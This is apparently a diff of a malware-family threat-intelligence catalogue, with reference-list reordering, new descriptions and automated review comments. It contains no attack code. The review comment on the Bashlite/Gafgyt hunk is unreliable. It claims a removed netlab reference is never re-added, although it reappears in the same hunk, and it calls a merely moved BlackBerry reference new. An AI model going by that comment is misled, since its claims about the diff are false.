"description": "According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.\r\n\r\nThe secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
- "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
"https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
"https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
+ "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
"https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
"https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/",
+ "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/",
"https://www.youtube.com/watch?v=GjquFKa4afU",
- "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf"
],
"synonyms": [
"HighShell",
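Review bot: the descriptions for the new Nightrunner and Tunna entries are the single word "WebShell.", which adds nothing beyond the `asp.` prefix already visible in the Malpedia path; at least name the platform (ASP/ASP.NET) and the actor context from the cited Securelist DeftTorero report, in the style of the adjacent TwoFace description.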
@@ -3080,15 +3333,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "9334c430-0d83-4893-8982-66a1dc1a2b11",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba",
"value": "TwoFace"
},
@@ -3105,14 +3349,14 @@
"value": "Unidentified ASP 001 (Webshell)"
},
{
- "description": "",
+ "description": "Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, perform internet scans, and serve web pages. It is probably linked to Xanthe-based clipjacking campaign.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot",
+ "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/",
"https://www.cadosecurity.com/the-continued-evolution-of-abcbot/",
- "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/",
"https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/",
- "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/"
+ "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/"
],
"synonyms": [],
"type": []
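Review bot: the new Abcbot description has a parallelism error and a missing article: "launching DDoS attacks, perform internet scans, and serve web pages" should read "launching DDoS attacks, performing internet scans, and serving web pages", and "linked to Xanthe-based clipjacking campaign" should read "linked to the Xanthe-based clipjacking campaign".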
@@ -3125,8 +3369,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor",
- "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf"
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
+ "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/"
],
"synonyms": [],
"type": []
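Review bot: the added reference `https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba` has a slug naming a different family ("portdoor"); please confirm the article actually covers ACBackdoor before attaching it to this cluster, or move it to the appropriate entry.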
@@ -3139,17 +3384,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
- "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html",
- "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/",
"https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
- "https://cybersecuritynews.com/acidrain-wiper-malware/",
+ "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html",
"https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat"
+ "https://cybersecuritynews.com/acidrain-wiper-malware/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/"
],
"synonyms": [],
"type": []
@@ -3162,8 +3408,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker",
- "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/",
"https://twitter.com/IntezerLabs/status/1326880812344676352",
+ "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
@@ -3201,21 +3447,21 @@
"value": "Aisuru"
},
{
- "description": "",
+ "description": "Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
"https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/",
"https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
"https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30"
],
"synonyms": [],
"type": []
@@ -3228,8 +3474,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel",
- "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-olive"
+ "https://www.secureworks.com/research/threat-profiles/bronze-olive",
+ "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf"
],
"synonyms": [
"Ghost RAT"
@@ -3246,10 +3492,11 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker",
"https://blog.lexfo.fr/Avoslocker.html",
"https://www.ic3.gov/Media/News/2022/220318.pdf",
- "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen",
"https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux"
+ "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen"
],
"synonyms": [],
"type": []
@@ -3288,15 +3535,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
"https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
"https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
"https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
"https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
"https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
],
"synonyms": [],
@@ -3335,24 +3583,38 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "350817e8-4d70-455e-b1fd-000bed4a4cf4",
+ "value": "BADCALL (ELF)"
+ },
+ {
+ "description": "Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
+ "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/",
"https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora",
- "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
- "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
- "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
+ "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
+ "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
"https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
"https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
- "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/",
- "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
"https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/",
+ "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
"https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
- "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
- "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/"
+ "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218",
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt"
],
"synonyms": [
"Gafgyt",
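Review bot: the `-` line for https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ has no matching `+` anywhere in the visible part of this Gafgyt hunk, whereas every other removed ref (Krebs, the vbot post, Hoaxcalls, Uptycs, Avira, Tor/Necro, public-cloud, Trend Micro) is re-added further down; confirm the drop is intentional and not a side effect of the reordering, and keep the reference if it is still valid. The only genuinely new refs here, the BlackBerry 2021 threat report and the Nozomi downgrade post, are hard to spot among the moved lines.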
@@ -3363,15 +3625,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "55f8fb60-6339-4bc2-baa0-41e698e11f95",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
"value": "Bashlite"
},
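Review bot: deleting the `related` block removes Bashlite's `similar` relationship to dest-uuid 55f8fb60-6339-4bc2-baa0-41e698e11f95 with no replacement in this hunk, so any consumer that follows cross-cluster relationships loses that edge. If the upstream Malpedia export no longer carries the link, state that in the commit message; otherwise restore the block.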
@@ -3388,11 +3641,28 @@
"uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209",
"value": "BCMPUPnP_Hunter"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian",
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f6be433e-7ed0-4777-876b-e3e2ba7d5c7f",
+ "value": "BianLian (ELF)"
+ },
{
"description": "Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost",
+ "https://twitter.com/strinsert1Na/status/1595553530579890176",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf",
+ "https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/",
"https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/"
],
"synonyms": [
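Review bot: the new BianLian (ELF) entry ships with `"description": ""` even though its three refs (the Malpedia page, the Redacted write-up and the RH-ISAC C2 infrastructure post) would support at least a one-line summary. An empty description renders as a bare name in the galaxy HTML, so either add a short description or note in the commit that it mirrors an empty Malpedia description.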
@@ -3429,30 +3699,51 @@
"uuid": "8e301f58-acef-48e7-ad8b-c27d3ed38eed",
"value": "BioSet"
},
+ {
+ "description": "ESXi encrypting ransomware, using a combination of the stream cipher ChaCha20 and RSA.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "35c86fef-18fe-491c-ad3c-13f98e8f5584",
+ "value": "Black Basta (ELF)"
+ },
{
"description": "ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.\r\n\r\nALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
- "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
- "https://blog.group-ib.com/blackcat",
- "https://killingthebear.jorgetesta.tech/actors/alphv",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
- "https://www.forescout.com/resources/analysis-of-an-alphv-incident",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
+ "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3",
"https://twitter.com/sisoma2/status/1473243875158499330",
"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
- "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
+ "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
+ "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
+ "https://www.forescout.com/resources/analysis-of-an-alphv-incident",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/",
"https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
- "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/"
+ "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
+ "https://blog.group-ib.com/blackcat",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://killingthebear.jorgetesta.tech/actors/alphv",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous"
],
"synonyms": [
"ALPHV",
@@ -3468,34 +3759,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://blog.group-ib.com/blackmatter#",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://twitter.com/VK_Intel/status/1423188690126266370",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
"https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
- "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
+ "https://twitter.com/VK_Intel/status/1423188690126266370",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
"https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
"https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
"https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
- "https://blog.group-ib.com/blackmatter2"
+ "https://blog.group-ib.com/blackmatter2",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
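Review bot: this BlackMatter hunk contains exactly one substantive change, the added VMware ESXi-targeting ransomware blog post; every other `-` ref reappears as a `+` ref elsewhere in the same list, so roughly 50 of the changed lines are pure reordering. If the generator writes refs in whatever order Malpedia returns them, sort them (or preserve the existing order) before serialising so that future diffs show only real additions and removals.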
@@ -3509,8 +3801,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota",
